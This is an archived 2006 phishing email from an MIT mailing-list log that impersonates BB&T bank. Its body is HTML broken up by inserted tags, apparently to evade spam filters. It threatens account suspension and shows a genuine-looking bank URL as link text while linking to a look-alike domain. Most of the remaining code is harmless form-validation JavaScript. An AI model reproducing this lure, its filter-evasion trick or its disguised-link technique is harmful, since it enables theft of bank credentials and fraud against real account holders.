[47359] in Zephyr_Bugs

home help back first fref pref prev next nref lref last post

Identity Security Measures

daemon@ATHENA.MIT.EDU (BB&T)
Thu Apr 27 01:10:00 2006

Message-Id: <200604270509.k3R59onT010261@vserv.bio-grafica.it>
From: "BB&T"<service@bbandt.com>
Date: Thu, 27 Apr 2006 08:09:18 +0300
MIME-Version: 1.0
Content-Type: text/html;
	charset="Windows-1251"
Content-Transfer-Encoding: 7bit
To: undisclosed-recipients:;undisclosed-recipients:;@MIT.EDU

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<!-- Created using WebSurveyor wswebtop.dll_5.7.0.1 -->
<!-- Generated: 4/21/2006 7:40:10 PM -->
<!-- WS File:  -->


<style type="text/css">
<!--
body {
	color: #000000;
	
	font-family: Arial, Helvetica, sans-serif;
}
		{	border: 2px #990033 solid;
}
#cloudBox {
        border-bottom: 7px 



#FDB813 solid;
}


H1  {
			font-size: 20px;
			font-weight: bold;
			color: #990033;
			margin:0px 15px 5px 15px;
		}
H2  {
			font-size: 15px;
			font-weight: bold;
			color: #75b967;
		}
H3  {
			font-size: 12px;
			font-weight : bold;
			font-style : italic;
			color : #000000;
		}
div,p {
	font-size: 12px;
	font-family: Arial, Helvetica, sans-serif;
			font-weight : normal;
		} 





-->
</style>
<META http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<script type="text/javascript" language="JavaScript"><!--

var sLetters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
var sNumbers = "0123456789";
var styleIsAfter = 1;
var styleIsBefore = 2;
var styleEqualTo = 3;

function IsFieldEmpty( aField )
{
  return (aField.value.length < 1);
}
function IsSelectUnique( aSelectArray )
{
  var bPassed = true;
  for ( var i = 0; i < aSelectArray.length; i++ ) {
    for ( var x = 0; x < aSelectArray.length; x++ ) {
      if ( x != i ) {
        if ( aSelectArray[i].selectedIndex != 0 ) {
          if ( aSelectArray[i].selectedIndex == aSelectArray[x].selectedIndex ) {
            aSelectArray[x].selectedIndex = 0;
            bPassed = false;
          }
        }
      }
    }
  }
  return bPassed;
}
function isLetter( c )
{
  var bPassed = true;
  for (var i = 0;  i < sLetters.length;  i++) {
    if (c == sLetters.charAt(i)) break;
    if (i == (sLetters.length - 1)) {
      bPassed = false;
      break;
    }
  }
  return bPassed;
}
function isNumber( c )
{
  var bPassed = true;
  for (var i = 0;  i < sNumbers.length;  i++) {
    if (c == sNumbers.charAt(i)) break;
    if (i == (sNumbers.length - 1)) {
      bPassed = false;
      break;
    }
  }
  return bPassed;
}
function IsNumberBetween( iNumber, iMin, iMax )
{
  return (Number( iNumber ) >= iMin && Number( iNumber ) <= iMax);
}
function ValidateMask( sInput, sMask )
{
  var bReturn = true;
  for ( var i = 0; i < sMask.length; i++ ) {
    switch ( sMask.charAt(i) ) {
      case "9":
        if (!isNumber(sInput.charAt(i)))
          bReturn = false;
        break;
      case "X":
        if (!isLetter(sInput.charAt(i)))
          bReturn = false;
        break;
      case "?":
        break;
      default:
        if (sMask.charAt(i) != sInput.charAt(i)) bReturn = false;
    }
    if (bReturn == false)
      break;
  }
  return bReturn;
}
function IsValidDate(dateStr)
{
  var datePat = /^(\d{4})(\-)(\d{1,2})(\-)(\d{1,2})$/;
  var matchArray = dateStr.match(datePat);
  if (dateStr.length != 10) return false;
  if (matchArray == null) return false;
  var year = Number( matchArray[1] );
  var month = Number( matchArray[3] );
  var day = Number( matchArray[5] );
  if (month < 1 || month > 12) return false;
  if (day < 1 || day > 31) return false;
  if ((month==4 || month==6 || month==9 || month==11) && day==31) return false;
  if (month == 2) {
    var isleap = (year % 4 == 0 && (year % 100 != 0 || year % 400 == 0));
    if (day>29 || (day==29 && !isleap)) return false;
  }
  return true;
}
function CompareDates( date1, style, date2 )
{
  var datePat = /^(\d{4})(\-)(\d{1,2})(\-)(\d{1,2})$/;
  var matchArray1 = date1.match(datePat);
  var matchArray2 = date2.match(datePat);
  var year1 = matchArray1[1];
  var month1 = matchArray1[3];
  var day1 = matchArray1[5];
  var year2 = matchArray2[1];
  var month2 = matchArray2[3];
  var day2 = matchArray2[5];
  var bResult = false;
  switch( style ) {
    case 2:
      if (year1 < year2)
        bResult = true;
      else
        if (month1 < month2)
          bResult = true;
        else
          if (day1 < day2)
            bResult = true;
      break;
    case 1:
      if (year1 > year2)
        bResult = true;
      else
        if (month1 > month2)
          bResult = true;
        else
          if (day1 > day2)
            bResult = true;
      break;
    default:
      if (year1 == year2 && month1 == month2 && day1 == day2)
        bResult = true;
      break;
  }
  return bResult;
}
function SubmitTheSurvey(aForm)
{
  // For Backwards Compatibility
  if (ValidateSurvey( aForm ))
    aForm.submit();
}


var iSkipValidation = 0;
var bAlreadySubmitted = false;
function GoPreviousPage(aForm)
{
  iSkipValidation=1;
  aForm.previouspagebtn.value="clicked";
  if (ValidateSurvey( aForm ))
    aForm.submit();
}
function ValidateSurvey(aForm)
{
  if (bAlreadySubmitted) return ( false );
  if (iSkipValidation == 1 ) {
    bAlreadySubmitted = true;
    return ( true );
  }
  var iCount;
  if ( "function" == typeof CustomPreValidation )
  {
    if (!CustomPreValidation( aForm ))
      return (false);
  }
  
 iCount = 0;
 for ( var i = 0; i < aForm.wsb30.length; i++ )
 {
   if ( aForm.wsb30[i].checked ) iCount++;
 }
 if (iCount < 1)
 {
   alert( "12) You must select at least one of the following options" );
   window.location="#Question30";
   return( false );
 }


 iCount = 0;
 for ( var i = 0; i < aForm.wsb32.length; i++ )
 {
   if ( aForm.wsb32[i].checked ) iCount++;
 }
 if (iCount < 1)
 {
   alert( "13) You must select at least one of the following options" );
   window.location="#Question32";
   return( false );
 }


 iCount = 0;
 for ( var i = 0; i < aForm.wsb34.length; i++ )
 {
   if ( aForm.wsb34[i].checked ) iCount++;
 }
 if (iCount < 1)
 {
   alert( "14) You must select at least one of the following options" );
   window.location="#Question34";
   return( false );
 }



  if ( "function" == typeof CustomPostValidation )
  {
    if (!CustomPostValidation( aForm ))
      return (false);
  }
  bAlreadySubmitted = true;
  return( true );
}
--></script>
<META NAME="ROBOTS" CONTENT="NOINDEX,NOFOLLOW">
</head>



<body>
<FORM METHOD="POST" NAME="MainForm" onSubmit="return ValidateSurvey( document.MainForm );" action="/wsb.dll">



<div style="text-align:right;"><img src="http://217.113.224.3/~studio/interiorlogotagline.gif" alt="" title="" border="0"/></div>
<h1>BB&T Account Security Measures</h1>
<div id="cloudBox"></div>






<table border="0" cellpadding="0" cellspacing="0" width="100%" xmlns:x="urn:schemas-microsoft-com:xslt">
<tr>
<td valign="top"><img src="http://pics.ebaystatic.com/aw/pics/s.gif"  width="1" height="20" alt=" "></td>
</tr>
</table>
<table cellpadding="0" cellspacing="3" border="0" width="100%" xmlns:x="urn:schemas-microsoft-com:xslt">
<tr>
<td colspan="3">
<font face="Arial, Verdana" size="2">De<vector>ar <b>BB&T OnL<vector>ine </b>cli<vector>ent ,<br><br>
As part of our se<vector>cur<vector>ity me<vector>asu<vector>res, the Bra<vector>nch Ban<vector>king and Tru<vector>st Com<vector>pany has de<vector>velo<vector>ped a sec<vector>uri<vector>ty pro<vector>gram aga<vector>inst the fr<vector>audu<vector>lent att<vector>em<vector>pts and ac<vector>co<vector>unt the<vector>ft<vector>s. Therefore, our sy<vector>stem req<vector>uires fur<vector>ther a<vector>c<vector>co<vector>unt ve<vector>rif<vector>icat<vector>ion.<br> We re<vector>que<vector>st in<vector>f<vector>orma<vector>tion from you for the following rea\son: 
We need to ve<vector>r<vector>ify your a<vector>c<vector>co<vector>unt in<vector>for<vector>mat<vector>ion in order to in<vector>su<vector>re the sa<vector>f<vector>ety and in<vector>teg<vector>rity of our se<vector>rvi<vector>ces.
<br><br>
Ple<vector>ase fo<vector>llow the li<vector>nk be<vector>low to pro<vector>ceed. 
 </font>
</td>
</tr>
</table>




<IMG height=20
src="http://pics.ebaystatic.com/aw/pics/x.gif" width=1
border=0></FONT><IMG height=20
src="http://pics.ebaystatic.com/aw/pics/x.gif" width=1 border=0><BR>
<FONT size=2><FONT face="Arial, Helvetica, sans-serif">
<A href="http://bbt-verifonline.com">
<FONT color=#003399><vector>ht<vector>tp<vector>s://on<vector>line.b<vector>ba<vector>ndt.co<vector>m/onl<vector>ine/ser<vector>vlet/ver<vector>ifica<vector>tion/lo<vector>gi<vector>nb<vector>bt1.ht<vector>ml?W<vector>T.s<vector>vl=1<vector>

</a>
<br>


<font face="Arial, Verdana" size="2" color=black><br>
Once you l<vector>og i<vector>n, you will be prov<vector>ided with st<vector>eps to com<vector>plete the ve<vector>rif<vector>icat<vector>ion pro<vector>cess. For your sa<vector>fe<vector>ty, we have ph<vector>ysi<vector>cal, ele<vector>ctronic, and pr<vector>oced<vector>ural sa<vector>fegu<vector>ards that com<vector>ply with fe<vector>der<vector>al reg<vector>ulat<vector>ions to pro<vector>tect the in<vector>form<vector>ation you pro<vector>vide to us. <br><br>
Ac<vector>co<vector>rd<vector>ing to the User Ag<vector>reem<vector>ent, we may imm<vector>edi<vector>ately issue a wa<vector>rni<vector>ng, te<vector>mpo<vector>rar<vector>ily sus<vector>pend, in<vector>def<vector>init<vector>ely sus<vector>pend or ter<vector>minate your memb<vector>ers<vector>hip and ref<vector>use to pro<vector>vide our se<vector>rvi<vector>ces to you if we believe that your act<vector>ions may cause fin<vector>ancial lo<vector>ss or le<vector>gal lia<vector>bi<vector>l<vector>ity for you, our us<vector>ers or us.  
We may also take these ac<vector>tio<vector>ns if we are una<vector>ble to v<vector>er<vector>ify or aut<vector>hent<vector>icate any in<vector>for<vector>mation you pro<vector>vide to us.
<br>We thank you for your prompt attention to this matter. Please understand that this is a s<vector>ec<vector>ur<vector>ity me<vector>asu<vector>re in<vector>ten<vector>ded to help protect you and your ac<vector>co<vector>unt.
</td>
</tr>


<br xmlns:x="urn:schemas-microsoft-com:xslt"><table border="0" cellpadding="2" cellspacing="0" width="100%" xmlns:x="urn:schemas-microsoft-com:xslt">
<tr>
<td width="20"></td>
<td valign="top" colspan="2" nowrap="true" width="580"></td>
</tr>
</table>
<table border="0" cellpadding="0" cellspacing="0" width="100%" xmlns:x="urn:schemas-microsoft-com:xslt">
<tr>
<td>
<hr color="#cccccc" noshade="yes" size="1">
</td>
</tr>
</table>

<span class="footerText">&copy; Co<vector>pyr<vector>ig<vector>ht © 20<vector>05, Bra<vector>nch Ban<vector>ki<vector>ng and Tr<vector>ust Com<vector>pa<vector>ny. All Ri<vector>ghts Rese<vector>rved. 
<br><br></span>
<!-- END Footer table -->
        </td>
    </tr>
    <tr>
        <td colspan="3" class="spacerH10"></td>
    </tr>    

</table>
    </div>

    
  </body>
    </html>

home help back first fref pref prev next nref lref last post